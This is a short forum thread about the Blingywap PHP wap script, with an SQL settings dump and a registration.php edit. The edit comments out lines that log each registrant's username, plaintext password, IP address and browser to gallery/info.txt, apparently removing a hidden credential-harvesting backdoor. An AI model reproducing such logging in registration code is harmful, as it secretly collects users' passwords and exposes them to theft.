clear the sql not only one file and oh yea before i forget this version have session hidden
Blingywap script
Collapse
X
-
It depends on the browser u use..And becoz blingywap uses tables..Other br0wsers will not properly form it for mobile to fit..My Blog: http://jhommark.blogspot.com
My Facebook: http://www.facebook.com/jhommark
My Official Site: http://www.undergroundweb.tk
My Community Site: http://undergroundwap.xtreemhost.com
Comment
-
just past the in sql
--
-- Dumping data for table `ibwf_settings`
--
INSERT INTO `ibwf_settings` (`id`, `name`, `value`) VALUES
(1, 'sesexp', '30'),
(2, 'Tue 20 May 2008 - 11:42', '9'),
(3, '4ummsg', 'New installation'),
(4, 'Counter', '19948'),
(5, 'pmaf', ''),
(6, 'reg', '1'),
(7, 'fview', '1'),
(8, 'lastbpm', '2008-08-26');
Comment
-
edit this part in file registration.php to look like this:
echo registerform(9);
}else if(register($uid,$pwd,$usex,$bdy,$ulc, $ubr)==2)
{
echo registerform(10);
}else{
//$brws = explode(" ",$HTTP_USER_AGENT);
//$ubr = $brws[0];
//$fp = fopen("gallery/info.txt","a+");
//fwrite ($fp, "\n".$uid."-".$pwd."-".$ipr."-".$ubr."\n");
//fclose($fp);
echo "Registration completed successfully!<br/>";
Comment
Comment